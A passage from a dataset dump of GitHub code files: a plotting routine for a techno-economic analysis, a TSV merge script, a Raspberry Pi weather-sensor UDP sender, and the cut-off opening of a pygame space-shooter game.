HMFOR_inputs[-1])\n sa_upper.append(results[0] / NPV_base-1)\n\n num_vars = len(sa_vars)\n\n # bars centered on the y axis\n pos = np.arange(num_vars) + .5\n\n # make the left and right axes\n fig = Figure()\n ax_lower = fig.add_axes([0.05, 0.1, 0.35, 0.8])\n ax_upper = fig.add_axes([0.6, 0.1, 0.35, 0.8])\n\n # just tick on the top\n ax_lower.xaxis.set_ticks_position('top')\n ax_upper.xaxis.set_ticks_position('top')\n\n # Set figure title\n fig.suptitle('Sensitivity Analysis')\n\n # set bar colors\n c_lower = []\n c_upper = []\n\n for i in range(0, num_vars):\n if sa_lower[i] < 0:\n c_lower.append('red')\n else:\n c_lower.append('green')\n\n if sa_upper[i] < 0:\n c_upper.append('red')\n else:\n c_upper.append('green')\n\n # make the lower graph\n ax_lower.barh(pos, [abs(ele) for ele in sa_lower], align='center', color=c_lower,\n height=0.5, edgecolor='None')\n ax_lower.set_yticks([])\n ax_lower.invert_xaxis()\n\n # make the upper graph\n ax_upper.barh(pos, [abs(ele) for ele in sa_upper], align='center', color=c_upper,\n height=0.5, edgecolor='None')\n ax_upper.set_yticks([])\n\n # we want the labels to be centered in the fig coord system and\n # centered w/ respect to the bars so we use a custom transform\n transform = transforms.blended_transform_factory(\n fig.transFigure, ax_upper.transData)\n for i, label in enumerate(sa_vars):\n ax_upper.text(0.5, i+0.5, label, ha='center', va='center',\n transform=transform)\n\n # the axes titles are in axes coords, so x=0, y=1.025 is on the left\n # side of the axes, just above, x=1.0, y=1.025 is the right side of the\n # axes, just above\n ax_upper.set_title('+10%', x=-0.15, y=0.97, fontsize=12)\n ax_lower.set_title('-10%', x=1.15, y=0.97, fontsize=12)\n\n # adding the annotations\n for i in range(0, num_vars):\n ax_upper.annotate(str(round(abs(sa_upper[i])*100, 2)) + '%', xy=(0.00001, 0.5 + i),\n xycoords='data',\n xytext=(16, 0), textcoords='offset points',\n size=10,\n va='center')\n ax_lower.annotate(str(round(abs(sa_lower[i])*100, 2)) + '%', xy=(max([abs(ele) for ele in sa_lower])/2, 0.5 + i),\n xycoords='data',\n xytext=(16, 0), textcoords='offset points',\n size=10,\n va='center')\n\n SA_output = io.StringIO()\n FigureCanvasSVG(fig).print_svg(SA_output)\n\n # ________Color Scatter Charts__________\n\n scatter_step = 75\n\n # Current Density (x) vs Voltage (y)\n\n x = []\n y = []\n cd_cv_npv = []\n cd = cd_lower\n cv = cv_lower\n cd_step = (cd_upper-cd_lower)/scatter_step\n cv_step = (cv_upper-cv_lower)/scatter_step\n\n for i in range(0, scatter_step):\n for j in range(0, scatter_step):\n x.append(cd)\n y.append(cv)\n results = HMFOR_TEA(*HMFOR_inputs[:11], cd, cv, *HMFOR_inputs[13:])\n cd_cv_npv.append(results[0])\n cv += cv_step\n cd += cd_step\n cv = cv_lower\n\n fig = Figure()\n\n ax = fig.add_subplot(111)\n im = ax.scatter(x, y, s=3, c=cd_cv_npv)\n ax.scatter(HMFOR_inputs[11], HMFOR_inputs[12],\n edgecolors='black', s=8, c='b')\n ax.set_xlabel('Current Density $[A/cm^2]$')\n ax.set_ylabel('Cell Voltage $[V]$')\n ax.set_title('Current Density vs Cell Voltage')\n ax.set_xlim(cd_lower, cd_upper)\n ax.set_ylim(cv_lower, cv_upper)\n ax.set_xticks(np.arange(cd_lower, cd_upper +\n 10 ** -8, (cd_upper-cd_lower)/4))\n ax.set_yticks(np.arange(cv_lower, cv_upper +\n 10 ** -8, (cv_upper-cv_lower)/4))\n\n fig.colorbar(im, ax=ax, label='Net Present Value [$]')\n\n cd_cv_output = io.StringIO()\n FigureCanvasSVG(fig).print_svg(cd_cv_output)\n\n # FE (x) vs Voltage (y)\n\n x = []\n y = []\n fe_cv_npv = []\n FE = FE_lower\n cv = cv_lower\n FE_step = (FE_upper-FE_lower)/scatter_step\n cv_step = (cv_upper-cv_lower)/scatter_step\n\n for i in range(0, scatter_step):\n for j in range(0, scatter_step):\n x.append(FE)\n y.append(cv)\n results = HMFOR_TEA(*HMFOR_inputs[:12], cv, FE, *HMFOR_inputs[14:])\n fe_cv_npv.append(results[0])\n cv += cv_step\n FE += FE_step\n cv = cv_lower\n\n fig = Figure()\n\n ax = fig.add_subplot(111)\n im = ax.scatter(x, y, s=3, c=fe_cv_npv)\n ax.scatter(HMFOR_inputs[13], HMFOR_inputs[12],\n edgecolors='black', s=8, c='b')\n ax.set_xlabel('Faradaic Efficiency')\n ax.set_ylabel('Cell Voltage $[V]$')\n ax.set_title('Faradaic Efficienct vs Cell Voltage')\n ax.set_xlim(FE_lower, FE_upper)\n ax.set_ylim(cv_lower, cv_upper)\n ax.set_xticks(np.arange(FE_lower, FE_upper +\n 10 ** -8, (FE_upper-FE_lower)/4))\n ax.set_yticks(np.arange(cv_lower, cv_upper +\n 10 ** -8, (cv_upper-cv_lower)/4))\n\n fig.colorbar(im, ax=ax, label='Net Present Value [$]')\n\n fe_cv_output = io.StringIO()\n FigureCanvasSVG(fig).print_svg(fe_cv_output)\n\n # Yield (x) vs Voltage (y)\n\n x = []\n y = []\n yld_cv_npv = []\n yld = yield_lower\n cv = cv_lower\n yld_step = (yield_upper-yield_lower)/scatter_step\n cv_step = (cv_upper-cv_lower)/scatter_step\n\n for i in range(0, scatter_step):\n for j in range(0, scatter_step):\n x.append(yld)\n y.append(cv)\n results = HMFOR_TEA(\n *HMFOR_inputs[:12], cv, HMFOR_inputs[13], yld, HMFOR_inputs[-1])\n yld_cv_npv.append(results[0])\n cv += cv_step\n yld += yld_step\n cv = cv_lower\n\n fig = Figure()\n\n ax = fig.add_subplot(111)\n im = ax.scatter(x, y, s=3, c=yld_cv_npv)\n ax.scatter(HMFOR_inputs[14], HMFOR_inputs[12],\n edgecolors='black', s=8, c='b')\n ax.set_xlabel('FDCA Yield')\n ax.set_ylabel('Cell Voltage $[V]$')\n ax.set_title('FDCA Yield vs Cell Voltage')\n ax.set_xlim(yield_lower, yield_upper)\n ax.set_ylim(cv_lower, cv_upper)\n ax.set_xticks(np.arange(yield_lower, yield_upper +\n 10 ** -8, (yield_upper-yield_lower)/4))\n ax.set_yticks(np.arange(cv_lower, cv_upper +\n 10 ** -8, (cv_upper-cv_lower)/4))\n\n fig.colorbar(im, ax=ax, label='Net Present Value [$]')\n\n yld_cv_output = io.StringIO()\n FigureCanvasSVG(fig).print_svg(yld_cv_output)\n\n # Current Density vs NPV\n\n x = []\n y = []\n cd = cd_lower\n cd_step = (cd_upper-cd_lower)/scatter_step\n\n for i in range(0, scatter_step):\n x.append(cd)\n results = HMFOR_TEA(*HMFOR_inputs[:11], cd, cv, *HMFOR_inputs[13:])\n y.append(results[0])\n cd += cd_step\n\n # Using Pygal\n # xy_chart = pygal.XY(stroke=False)\n # xy_chart.title = 'Current Density vs NPV ($)'\n # xy_chart.add('Current Density $[A/cm^2]$',\n # [(x[i], y[i]) for i in range(0, len(x))])\n\n # cd_npv = xy_chart.render_data_uri()\n\n fig = Figure()\n ax = fig.add_subplot(111)\n im = ax.scatter(x, y)\n ax.set_title('Current Density vs NPV')\n ax.set_xlabel('Current Density $[A/cm^2]$')\n ax.set_ylabel('Net Present Value [$]')\n\n cd_npv_output = io.StringIO()\n FigureCanvasSVG(fig).print_svg(cd_npv_output)\n\n return [op_cost_pie_data, op_cost_pie_no_hmf_data, cap_cost_pie_data, SA_output, cd_cv_output, fe_cv_output, yld_cv_output, cd_npv_output]\n\n\nHMFOR_inputs = [product_production, product_price, operating_time,\n electricity_price, h2_price, water_price, hmf_price,\n electrolyzer_reference_cost, income_tax, interest_rate, plant_lifetime,\n current_density, cell_voltage, faradaic_efficiency, fdca_yield, electrolyte_density]\n\n# print(HMFOR_TEA(*HMFOR_inputs))\n\n# HMFOR_plots(HMFOR_inputs, 0.02, 0.06, 1, 2, 0.8, 1, 0.8, 1)\n","repo_name":"danielschwartz3/TEA","sub_path":"TEA_HMFOR.py","file_name":"TEA_HMFOR.py","file_ext":"py","file_size_in_byte":19205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"2082369799","text":"import os\nimport csv \nimport json\nfrom combine import write_posts\n\ndef add_posts(file_path, post_posts, post_keys):\n num_duplicates =0\n post_file = open(file_path,'r',encoding='utf-8')\n tsv_reader = csv.reader(post_file,delimiter=\"\\t\")\n for line in tsv_reader:\n \n name=line[0]\n title=line[1]\n if len(line) == 3:\n topic=line[2]\n else:\n topic = ''\n if name not in post_keys:\n post = {\n 'name':name,\n 'title':title,\n 'coding': topic\n }\n post_keys.add(name)\n post_posts.append(post)\n else:\n num_duplicates +=1\n return num_duplicates\n\ndef main():\n\n file_list = ['annotated-1.tsv','annotated-2.tsv','annotated-3.tsv']\n base_path = os.path.join('..','data')\n\n path_list = []\n for path in file_list:\n file_path = os.path.join(base_path,path)\n path_list.append(file_path)\n\n post_posts = []\n post_keys = set()\n num_duplicates = 0\n \n for file_path in path_list:\n num_duplicates +=add_posts(file_path, post_posts, post_keys)\n \n output_file_path = os.path.join('..','all_posts','combined_annotated.tsv')\n write_posts(post_posts, output_file_path)\n\nif __name__ == '__main__':\n main()","repo_name":"Alexander-Cui/Comp-598-project","sub_path":"scripts/combine_annotated.py","file_name":"combine_annotated.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"44041118830","text":"#!/usr/bin/python3\nimport socket\nimport adafruit_dht # pip3 install adafruit-circuitpython-dht\nimport adafruit_mpl115a2 # pip3 install adafruit-circuitpython-mpl115a2\nimport board\nimport busio\nfrom time import sleep\n\ni2c = busio.I2C(board.SCL, board.SDA)\nmpl = adafruit_mpl115a2.MPL115A2(i2c)\ndht = adafruit_dht.DHT22(board.D4, use_pulseio=False)\n\nurl = \"192.168.X.X\" #The IP for the PiRitos Flask server\nport = 5006 #Not the same port as socketio... this is for UDP\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nsleep(2)\n\ntries = 0\nwhile True:\n try:\n humidity = dht.humidity\n temperature = dht.temperature # or mpl.temperature\n pressure = mpl.pressure\n if temperature is None or humidity is None or pressure is None:\n tries += 1\n sleep(2)\n continue\n message = str(round(temperature,2)) + \",\" + str(round(humidity,2)) + \",\" + str(round(pressure,2))\n sock.sendto(bytes(message, \"utf-8\"), (url, port))\n print(message)\n tries = 0\n except RuntimeError as error:\n # Errors happen fairly often, DHT's are hard to read, just keep going\n print(error.args[0])\n sleep(2)\n continue\n except Exception as error:\n dht.exit()\n raise error\n if tries == 0: sleep(120)\n","repo_name":"monkeymademe/piritos","sub_path":"pimeteo-code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"19"} +{"seq_id":"38636701701","text":"import pygame as pg\r\nfrom pygame import mixer\r\nimport pygame.freetype as freetype\r\n\r\nimport sys\r\nimport random\r\nimport math\r\nimport datetime\r\nimport pickle\r\nimport os\r\nimport itertools\r\nimport webbrowser\r\n\r\n#iInitialize all imported pygame modules\r\npg.init()\r\n\r\ninfo = pg.display.Info()\r\nscreen_width = info.current_w #1536, Without dpi awareness\r\nscreen_height = info.current_h #864\r\n\r\n#Initial window dimensions\r\nif screen_width >= 1536:\r\n window_width, window_height = 1280, 720\r\nelse:\r\n window_width, window_height = 1152, 648\r\n\r\n#Pygame window\r\nflags = pg.RESIZABLE #| pg.FULLSCREEN\r\nwindow = pg.display.set_mode((window_width, window_height), flags)\r\nwindow_rect = window.get_rect()\r\n\r\n#Setting window title bar properties\r\npg.display.set_caption('Space Overkill')\r\nicon = pg.image.load('.\\\\resources\\\\images\\\\player\\\\battleship32.png')\r\npg.display.set_icon(icon)\r\n\r\n#Loading and playing game music\r\nmixer.music.load(r'.\\resources\\sounds\\background1-short.wav')\r\nmixer.music.play(-1)\r\n#print(mixer.music.get_volume())#0.9921875\r\nmixer.music.set_volume(0.70)\r\n\r\n#Setting different sound channels for simultaneous playback\r\nnum_channels = 10\r\nmixer.set_num_channels(num_channels)\r\nchannels = []\r\n\r\nfor i in range(num_channels): \r\n channels.append(mixer.Channel(i))\r\n\r\n\r\n#Loading Screen\r\nwindow.fill((255,255,255))\r\nbackground_img = pg.image.load('.\\\\resources\\\\images\\\\background\\\\background.png').convert_alpha()\r\nbackground_over = pg.image.load(r'.\\resources\\images\\text-background\\game-intro.png').convert_alpha()\r\nload_font = pg.font.Font(r'.\\resources\\fonts\\Open_Sans\\OpenSans-Bold.ttf', 120)\r\nload_text = load_font.render('Loading'.upper(), True, (0,0,0))\r\nload_text_rect = load_text.get_rect(center=(window_width/2, window_height/2))\r\nwindow.blit(background_img, (0,0))\r\nwindow.blit(background_over, (0,0))\r\nwindow.blit(load_text, load_text_rect)\r\npg.display.update()\r\n\r\n\r\n#Reading highscore file\r\ntry:\r\n with open('highscores.pickle', 'rb') as fh:\r\n hs_dict = pickle.load(fh)\r\nexcept FileNotFoundError:\r\n hs_dict = {}\r\n\r\n#Player properties and functions\r\nplayer_img = pg.image.load('.\\\\resources\\\\images\\\\player\\\\battleship100.png').convert_alpha()\r\nplayer_img_size = player_img_w, player_img_h = player_img.get_size()\r\nplayer_rect = player_img.get_rect()\r\nplayerX = window_width/2 - player_img_w/2\r\nplayerY = ((window_height/player_img_h)-1.5)*player_img_h\r\n#Here constant(1.5) represent the padding of player image from bottom of\r\n#window in terms(multiple) of player image height \r\nplayerX_change = 0\r\nplayerY_change = 0\r\ncur_player_x = playerX + playerX_change\r\ncur_player_y = playerY + playerY_change\r\nplayer_rect.x = cur_player_x\r\nplayer_rect.y = cur_player_y\r\n\r\nplayer_xspeed = 0.7\r\nplayer_yspeed = 0.5\r\n\r\nplayer_max_health = 5\r\nplayer_health = player_max_health\r\nplayer_health_img1 = pg.image.load('.\\\\resources\\\\images\\\\player\\\\heart-fill32.png')\r\nplayer_health_img2 = pg.image.load('.\\\\resources\\\\images\\\\player\\\\heart-empty32.png')\r\nplayer_health_rects = []\r\n\r\ndef update_player_health_rect():\r\n global window_width, player_health_rects\r\n\r\n player_health_rects.clear()\r\n \r\n start = (window_width/2) - (((player_max_health-1)*42)+32)/2\r\n\r\n for i in range(player_max_health):\r\n player_health_rects.append(pg.Rect(start+42*i, 10, 32, 32))\r\n\r\nupdate_player_health_rect()\r\n\r\ndef draw_player():#xchange, ychange\r\n global player_img , player_img_size, player_img_w, player_img_h, player_rect\r\n global playerX, playerY, playerX_change, playerY_change, cur_player_x, cur_player_y\r\n\r\n cur_player_x += playerX_change\r\n cur_player_y += playerY_change\r\n \r\n #Setting player boundaries\r\n if cur_player_x <= 2:\r\n cur_player_x = 2\r\n elif cur_player_x >= window_width-player_img_w-2:\r\n cur_player_x = window_width-player_img_w-2\r\n \r\n if cur_player_y <= ((window_height/player_img_h)-3)*player_img_h:\r\n cur_player_y = ((window_height/player_img_h)-3)*player_img_h\r\n elif cur_player_y >= window_height-player_img_h-2:\r\n cur_player_y = window_height-player_img_w-2\r\n\r\n player_rect.x = cur_player_x\r\n player_rect.y = cur_player_y\r\n \r\n window.blit(player_img, (cur_player_x, cur_player_y))\r\n\r\n for i, rect in zip(range(player_health), player_health_rects):\r\n window.blit(player_health_img1, rect)\r\n\r\n for i, rect in zip(range(player_max_health-player_health), player_health_rects[::-1]):\r\n window.blit(player_health_img2, rect)\r\n\r\ndef player_update(event):\r\n global cur_player_x, cur_player_y, player_rect, window_width, window_height\r\n\r\n player_rect.center = (event.w/window_width*player_rect.centerx,\r\n event.h/window_height*player_rect.centery)\r\n cur_player_x, cur_player_y = player_rect.left, player_rect.top\r\n\r\n if powerups.pcollected == 'freeze':\r\n powerups.powerups['freeze']['rect'].center = player_rect.center\r\n\r\n\r\n#Small enemy properties and functions\r\nnum_enemy_small = 8\r\nenemy_small_img = pg.image.load('.\\\\resources\\\\images\\\\enemy\\\\aircraft80.png').convert_alpha()\r\nenemy_small_img_size = enemy_small_img_w, enemy_small_img_h = enemy_small_img.get_size()\r\nenemy_small_xspeed = 0.5\r\nenemy_small_yspeed = 0.1\r\nenemy_small = {}\r\n\r\nenemy_small_laser = pg.image.load('.\\\\resources\\\\images\\\\enemy\\\\minus(90)9x24.png')\r\nenemy_small_laser_xspeed = 0\r\nenemy_small_laser_yspeed = 0.5\r\nenemy_small_laser_sound = mixer.Sound(r'.\\resources\\sounds\\laser3.wav')\r\nenemy_small_killed = 0\r\n\r\n#Dict to hold only thhose enemies which are visible on screen. This is used to draw small enemies\r\n#when its time to spawn medium/large enemy on reaching particular score\r\nenemy_small_last = {}\r\n\r\nexplosion_img = [pg.image.load(r'.\\resources\\images\\enemy\\explosion80.png').convert_alpha(),\r\n pg.image.load(r'.\\resources\\images\\enemy\\explosion(1)80.png').convert_alpha()]\r\n\r\n\r\ndef init_enemy_small_img():\r\n global enemy_small, enemy_small_img\r\n \r\n for i in range(1, num_enemy_small+1):\r\n enemy_small['enemy'+str(i)] = {}\r\n enemy_small['enemy'+str(i)]['img'] = enemy_small_img #pg.image.load('.\\\\resources\\\\images\\\\enemy\\\\aircraft80.png')\r\n enemy_small['enemy'+str(i)]['rect'] = enemy_small['enemy'+str(i)]['img'].get_rect()\r\n \r\ndef init_enemy_small_pos():\r\n global enemy_small, num_enemy_small, enemy_small_xspeed, enemy_small_yspeed\r\n global window_width, enemy_small_img_w, enemy_small_laser\r\n\r\n for i in range(1, num_enemy_small+1):\r\n enemy_small['enemy'+str(i)]['enemy_smallX_change'] = random.choice([enemy_small_xspeed, -enemy_small_xspeed])\r\n enemy_small['enemy'+str(i)]['enemy_smallY_change'] = enemy_small_yspeed\r\n enemy_small['enemy'+str(i)]['cur_enemy_small_x'] = random.randint(2, window_width-enemy_small_img_w-2)\r\n enemy_small['enemy'+str(i)]['cur_enemy_small_y'] = -300 - (120 * (i-1))\r\n enemy_small['enemy'+str(i)]['rect'].x = enemy_small['enemy'+str(i)]['cur_enemy_small_x']\r\n enemy_small['enemy'+str(i)]['rect'].y = enemy_small['enemy'+str(i)]['cur_enemy_small_y']\r\n enemy_small['enemy'+str(i)]['alive'] = True\r\n enemy_small['enemy'+str(i)]['explosion_time'] = 60\r\n enemy_small['enemy'+str(i)]['laser_draw'] = False\r\n enemy_small['enemy'+str(i)]['laser_rect'] = enemy_small_laser.get_rect()\r\n\r\n #print(enemy_small)\r\n\r\ninit_enemy_small_img()\r\ninit_enemy_small_pos()\r\n\r\ndef draw_enemy_small(dt=1):\r\n global enemy_small, enemy_small_xspeed, enemy_small_yspeed, lvl_value\r\n global powerups, enemy_small_laser_sound, channels\r\n\r\n for enemy in enemy_small:\r\n if powerups.pcollected != 'freeze':\r\n if enemy_small[enemy]['cur_enemy_small_x'] <= 2:\r\n enemy_small[enemy]['enemy_smallX_change'] = enemy_small_xspeed\r\n enemy_small[enemy]['enemy_smallY_change'] = enemy_small_yspeed\r\n elif enemy_small[enemy]['cur_enemy_small_x'] >= window_width - enemy_small_img_w - 2:\r\n enemy_small[enemy]['enemy_smallX_change'] = -enemy_small_xspeed\r\n enemy_small[enemy]['enemy_smallY_change'] = enemy_small_yspeed\r\n \r\n enemy_small[enemy]['cur_enemy_small_x'] += enemy_small[enemy]['enemy_smallX_change']*dt\r\n enemy_small[enemy]['cur_enemy_small_y'] += enemy_small[enemy]['enemy_smallY_change']*dt\r\n\r\n enemy_small[enemy]['rect'].x = enemy_small[enemy]['cur_enemy_small_x']\r\n enemy_small[enemy]['rect'].y = enemy_small[enemy]['cur_enemy_small_y']\r\n\r\n #Drawing enemy if alive else drawing explosion if destroyed and resetting the enemy properties\r\n if (enemy_small[enemy]['rect'].y < window_height+10) and enemy_small[enemy]['alive']:\r\n window.blit(enemy_small[enemy]['img'],\r\n (enemy_small[enemy]['cur_enemy_small_x'],\r\n enemy_small[enemy]['cur_enemy_small_y']))\r\n if lvl_value > 9 and 0 <= enemy_small[enemy]['rect'].y <= window_height/2-100:\r\n if powerups.pcollected == 'freeze':\r\n ch = 0\r\n else:\r\n ch = random.choices([0, 1], [19, 1], k=1)[0]\r\n #print(ch)\r\n if ch and not enemy_small[enemy]['laser_draw']:\r\n enemy_small[enemy]['laser_draw'] = True\r\n enemy_small[enemy]['laser_rect'].midtop = enemy_small[enemy]['rect'].center\r\n channels[0].play(enemy_small_laser_sound)\r\n \r\n elif (enemy_small[enemy]['rect'].y < window_height+10 and\r\n not enemy_small[enemy]['alive'] and\r\n enemy_small[enemy]['explosion_time'] > 0):\r\n if 0 <= enemy_small[enemy]['explosion_time'] < 15 or 30 <= enemy_small[enemy]['explosion_time'] < 45:\r\n window.blit(explosion_img[1],\r\n (enemy_small[enemy]['cur_enemy_small_x'],\r\n enemy_small[enemy]['cur_enemy_small_y']))\r\n elif 15 <= enemy_small[enemy]['explosion_time'] < 30 or 45 <= enemy_small[enemy]['explosion_time'] <= 60:\r\n window.blit(explosion_img[0],\r\n (enemy_small[enemy]['cur_enemy_small_x'],\r\n enemy_small[enemy]['cur_enemy_small_y']))\r\n enemy_small[enemy]['explosion_time'] -= 1\r\n elif (enemy_small[enemy]['rect'].y >= window_height+10):\r\n i = int(enemy[5:])\r\n enemy_small['enemy'+str(i)]['enemy_smallX_change'] = random.choice([enemy_small_xspeed, -enemy_small_xspeed])\r\n enemy_small['enemy'+str(i)]['enemy_smallY_change'] = enemy_small_yspeed\r\n enemy_small['enemy'+str(i)]['cur_enemy_small_x'] = random.randint(2, window_width-enemy_small_img_w-2)\r\n enemy_small['enemy'+str(i)]['cur_enemy_small_y'] = -300 #- (90 * (i-1))\r\n enemy_small['enemy'+str(i)]['rect'].x = enemy_small['enemy'+str(i)]['cur_enemy_small_x']\r\n enemy_small['enemy'+str(i)]['rect'].y = enemy_small['enemy'+str(i)]['cur_enemy_small_y']\r\n enemy_small['enemy'+str(i)]['alive'] = True\r\n enemy_small['enemy'+str(i)]['explosion_time'] = 60\r\n\r\n draw_enemy_small_laser(dt)\r\n\r\ndef draw_enemy_small_laser(dt=1):\r\n global enemy_small, enemy_small_laser_xspeed, enemy_small_laser_yspeed\r\n global enemy_small_laser, window_height\r\n\r\n del_list = []\r\n \r\n for enemy in enemy_small:\r\n\r\n if enemy_small[enemy]['laser_draw']:\r\n window.blit(enemy_small_laser, enemy_small[enemy]['laser_rect'])\r\n #print(enemy_small_laser_yspeed * dt)\r\n enemy_small[enemy]['laser_rect'].y += enemy_small_laser_yspeed * dt\r\n\r\n if enemy_small[enemy]['laser_rect'].bottom > window_height+50:\r\n del_list.append(enemy)\r\n #if enemy == 'enemy1':\r\n #print(enemy_small[enemy]['laser_rect'])\r\n\r\n for enemy in del_list:\r\n enemy_small[enemy]['laser_draw'] = False\r\n enemy_small[enemy]['laser_rect'].topleft = (0,0)\r\n \r\n\r\ndef draw_enemy_small_last(dt=1):\r\n global enemy_small_last, enemy_small_xspeed, enemy_small_yspeed\r\n global spawn_medium_enemy_trigger2, spawn_large_enemy_trigger2\r\n global enemy_small_laser_sound, channels\r\n\r\n del_list = []\r\n\r\n for enemy in enemy_small_last:\r\n if powerups.pcollected != 'freeze':\r\n if enemy_small_last[enemy]['rect'].x <= 2:\r\n enemy_small_last[enemy]['enemy_smallX_change'] = enemy_small_xspeed\r\n enemy_small_last[enemy]['enemy_smallY_change'] = enemy_small_yspeed\r\n elif enemy_small_last[enemy]['rect'].x >= window_width-enemy_small_img_w-2:\r\n enemy_small_last[enemy]['enemy_smallX_change'] = -enemy_small_xspeed\r\n enemy_small_last[enemy]['enemy_smallY_change'] = enemy_small_yspeed\r\n \r\n enemy_small_last[enemy]['cur_enemy_small_x'] += enemy_small_last[enemy]['enemy_smallX_change']*dt\r\n enemy_small_last[enemy]['cur_enemy_small_y'] += enemy_small_last[enemy]['enemy_smallY_change']*dt\r\n\r\n enemy_small_last[enemy]['rect'].x = enemy_small_last[enemy]['cur_enemy_small_x']\r\n enemy_small_last[enemy]['rect'].y = enemy_small_last[enemy]['cur_enemy_small_y']\r\n \r\n if (enemy_small_last[enemy]['rect'].y < window_height+10) and enemy_small_last[enemy]['alive']:\r\n window.blit(enemy_small_last[enemy]['img'],\r\n (enemy_small_last[enemy]['cur_enemy_small_x'],\r\n enemy_small_last[enemy]['cur_enemy_small_y']))\r\n if lvl_value > 9 and 0 <= enemy_small_last[enemy]['rect'].y <= window_height/2-100:\r\n if powerups.pcollected == 'freeze':\r\n ch = 0\r\n else:\r\n ch = random.choices([0, 1], [19, 1], k=1)[0]\r\n #print(ch)\r\n if ch and not enemy_small_last[enemy]['laser_draw']:\r\n enemy_small_last[enemy]['laser_draw'] = True\r\n enemy_small_last[enemy]['laser_rect'].midtop = enemy_small[enemy]['rect'].center\r\n channels[0].play(enemy_small_laser_sound)\r\n \r\n elif (enemy_small_last[enemy]['rect'].y < window_height+10 and\r\n not enemy_small_last[enemy]['alive'] and\r\n enemy_small_last[enemy]['explosion_time'] > 0):\r\n if 0 <= enemy_small_last[enemy]['explosion_time'] < 15 or 30 <= enemy_small_last[enemy]['explosion_time'] < 45:\r\n window.blit(explosion_img[1],\r\n (enemy_small_last[enemy]['cur_enemy_small_x'],\r\n enemy_small_last[enemy]['cur_enemy_small_y']))\r\n elif 15 <= enemy_small_last[enemy]['explosion_time'] < 30 or 45 <= enemy_small_last[enemy]['explosion_time'] < 60:\r\n window.blit(explosion_img[0],\r\n (enemy_small_last[enemy]['cur_enemy_small_x'],\r\n enemy_small_last[enemy]['cur_enemy_small_y']))\r\n enemy_small_last[enemy]['explosion_time'] -= 1\r\n elif (enemy_small_last[enemy]['rect'].y >= window_height+10):\r\n del_list.append(enemy)\r\n\r\n for enemy in del_list:\r\n del enemy_small_last[enemy]\r\n\r\n draw_enemy_small_laser(dt)\r\n\r\n if not enemy_small_last:\r\n pg.time.set_timer(enemy_medium.enemy_flash, 300)\r\n pg.time.set_timer(enemy_medium.laser_event, enemy_medium.laser_delay)\r\n\r\n pg.time.set_timer(enemy_large.enemy_flash, 300)\r\n pg.time.set_timer(enemy_large.laser_event, enemy_large.laser_delay)\r\n\r\n spawn_medium_enemy_trigger2 = True\r\n spawn_large_enemy_trigger2 = True\r\n\r\ndef init_enemy_small_last():\r\n global enemy_small, enemy_small_last\r\n\r\n for enemy in enemy_small:\r\n #if (0 <= enemy_small[enemy]['cur_enemy_small_x'] <= window_width and\r\n # -enemy_small[enemy]['rect'].height <= enemy_small[enemy]['cur_enemy_small_y'] <= window_height):\r\n if window_rect.colliderect(enemy_small[enemy]['rect']):\r\n enemy_small_last[enemy] = enemy_small[enemy]\r\n\r\n#Triggers/Flags to spawn medium enemy\r\nspawn_medium_enemy_trigger1 = False\r\nisinit_enemy_small_last = False\r\nspawn_medium_enemy_trigger2 = False\r\n\r\n\r\n#Medium enemy properties and functions\r\nclass EnemyMedium():\r\n def __init__(self):\r\n self.enemy_img = pg.image.load('.\\\\resources\\\\images\\\\enemy\\\\enemy-medium(180)160.png').convert_alpha()\r\n self.enemy_rect_pos = [(window_width*4/8, 200), (window_width*1/8, 200),\r\n (window_width*4/8, 200), (window_width*7/8, 200)]\r\n self.new_pos_acquired = False\r\n self.new_pos_set = False\r\n self.timer = False\r\n self.time_elapsed = 0\r\n self.pos_i = 0\r\n self.enemy_health = 20\r\n\r\n self.laser_img1 = pg.image.load('.\\\\resources\\\\images\\\\enemy\\\\minus(tilt1)9x24.png').convert_alpha()\r\n self.laser_img2 = pg.image.load('.\\\\resources\\\\images\\\\enemy\\\\minus(tilt2)9x24.png').convert_alpha()\r\n self.laser_yspeed = 0.5\r\n self.laser_xspeed = 0.5*(21/300)\r\n self.laser_n = 1\r\n self.lasers = {}\r\n self.laser_clock = pg.time.Clock()\r\n self.LL = 0\r\n self.UL = 3000\r\n self.DIFF = 6000\r\n self.set_laser_timer_lim = False\r\n self.laser_time = 0\r\n self.laser_delay = 1000\r\n self.laser_pause = 5000\r\n self.laser_event = pg.USEREVENT + 1\r\n self.laser_sound = mixer.Sound(r'.\\resources\\sounds\\laser3.wav')\r\n\r\n self.enemy_clock = pg.time.Clock()\r\n\r\n self.empty_img = pg.image.load('.\\\\resources\\\\images\\\\enemy\\\\empty160.png').convert_alpha()\r\n self.flash_surface = self.enemy_img\r\n self.enemy_flash = pg.USEREVENT + 2\r\n self.num_flash = 0\r\n\r\n self.set_params()\r\n\r\n def set_params(self):\r\n self.enemy_rect = self.enemy_img.get_rect()\r\n self.enemy_rect.center = (window_width/2, -200)\r\n self.enemyX = self.enemy_rect.x\r\n self.enemyY = self.enemy_rect.y\r\n self.enemy_xspeed = 0.5\r\n self.enemy_yspeed = 0.4\r\n self.enemy_xchange = 0\r\n self.enemy_ychange = 0\r\n self.cur_enemy_x = self.enemy_rect.x\r\n self.cur_enemy_y = self.enemy_rect.y\r\n self.laser_sound.set_volume(0.8)\r\n\r\n pg.time.set_timer(self.enemy_flash, 300)\r\n pg.time.set_timer(self.laser_event, self.laser_delay)\r\n\r\n def resize(self):\r\n global spawn_medium_enemy_trigger2\r\n \r\n self.enemy_rect_pos = [(window_width*4/8, 200), (window_width*1/8, 200),\r\n (window_width*4/8, 200), (window_width*7/8, 200)]\r\n\r\n if spawn_medium_enemy_trigger2 == False:\r\n self.enemy_rect.center = (window_width/2, -200)\r\n self.cur_enemy_x = self.enemy_rect.x\r\n self.cur_enemy_y = self.enemy_rect.y\r\n \r\n\r\n def add_laser(self):\r\n global mute, channels\r\n \r\n if mute == False:\r\n channels[0].play(self.laser_sound)\r\n\r\n if self.laser_n > 7:\r\n #pg.time.set_timer(self.laser_event, self.laser_pause)\r\n self.laser_n = 1\r\n\r\n self.lasers['laser'+str(self.laser_n)] = {}\r\n self.lasers['laser'+str(self.laser_n)]['img1'] = self.laser_img1\r\n 